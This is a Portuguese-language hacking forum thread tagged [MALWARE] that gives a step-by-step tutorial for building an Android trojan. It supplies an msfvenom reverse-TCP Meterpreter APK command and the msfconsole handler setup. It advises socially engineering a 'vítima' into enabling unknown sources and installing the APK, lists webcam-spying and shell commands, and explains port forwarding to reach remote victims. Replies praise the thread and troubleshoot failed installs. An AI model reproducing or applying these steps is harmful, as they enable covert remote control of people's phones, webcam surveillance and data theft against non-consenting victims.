Welcome to Shadow Network

Seja bem-vindo ao nosso fórum, registre-se para poder interagir em nosso fórum

tomz

[MALWARE]
Invasão android com payload [Conexão reversa]

8 posts neste tópico

Salve,

Como criar um Trojan para invadir um Android.

Abra seu terminal, digite o seguinte comando: msfvenom -p android/meterpreter/reverse_tcp LHOST=SEUIP LPORT=PORTA_USADA_PARA_CONEXÃO R > /root/Desktop/NOMEDOAPK.apk

tumblr_oibaitIxYc1runbmbo1_1280.png

Confira o comando, e execute.

tumblr_oibal7qDV31runbmbo1_1280.png

Irá criar um arquivo com extensão APK na area de trabalho da sua máquina.

ATENÇÃO

Antes de mandar isso pra pessoa (Sim, você tem que fazer ela instalar o aplicativo no celular dela para funcionar, lembrando que como é um aplicativo desconhecido, você com sua engenharia social, terá que dizer pra ela liberar a instalação de aplicativo de terceiros: Configurações -> Segurança -> Fontes Desconhecidas "Permitir a instalação de aplicativos de fontes desconhecidas.")

Abra um novo terminal (Ctrl+Shift+n) e execute esses comandos:

Digite: msfconsole 

tumblr_oib9cjWZyM1runbmbo1_1280.png

Agora execute esses comandos(um de cada vez):

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost SEU_IP

set lport A_PORTA_USADA

exploit

Ficará mais ou menos assim:

tumblr_oib9ncZLWq1runbmbo1_1280.png

Quando o terminal estiver semelhante à screenshot, é porque está esperando a pessoa instalar o aplicativo. Assim que instalar irá estabelecer a conexão. 

Obs: você deve executar os comandos no MSFCONSOLE antes de mandar a pessoa instalar e abrir.

Quando estabelecer a conexão entre você e a "vítima" ficará mais ou menos assim:

tumblr_oiba4954pr1runbmbo1_1280.png

Nesse caso você já está dentro do Android da pessoa, para saber os comandos digite : ?.

 

ALGUNS COMANDOS

webcam_list: lista as webcams que tem.

webcam_stream: streama a webcam da pessoa.

webcam_snap: tira um print da webcam da pessoa.

shell: entra no dos do android

 

----- LEIA -----

Pra você conseguir uma conexão com quem não está na sua rede (wifi por exemplo) você vai ter que:

Abrir a porta usada (no meu caso foi a 4444) do seu modem PELO KALI, e criar um dns dinâmico (use o site www.noip.com pra isso).

 

Valeu galera, deixe sua crítica :')

 

 

Tomz

4

Compartilhar este post


Link para o post
Compartilhar em outros sites

Muito bom, ótimo tutorial ! Pelo  msfvenom metasploit, da pra criar também para o linux e outros, recomendo ! Não queiram criar apk para colocar no fórum, poderá sofrer sérios danos kk

1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caralho maluco ! Tópico muito bem feito de qualidade up parabéns !

0

Compartilhar este post


Link para o post
Compartilhar em outros sites

aqui quando eu tento instalar o arquivo no meu cel diz q n da p instalar, e eu ja marquei a opção de permitir instalações de arquivos "estranhos" e tal

0

Compartilhar este post


Link para o post
Compartilhar em outros sites
Em 29/12/2016 at 9:50 PM, |MR J4X| disse:

aqui quando eu tento instalar o arquivo no meu cel diz q n da p instalar, e eu ja marquei a opção de permitir instalações de arquivos "estranhos" e tal

Pode ser que a versão do Android não seja compatível com o aplicativo criado pelo msfvenom, meu android do celular 4.2.2 não funcionou também!

0

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!


Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.


Entrar Agora

Shadow Network

Seja Bem-Vindo ao nosso fórum, construído com o intuito de compartilhar idéias e conhecimentos ao alcance de qualquer pessoa que tenha vontade de aprender.

Atencao

Em caso de bugs/erros no forum, entre em contato com algum membro da equipe.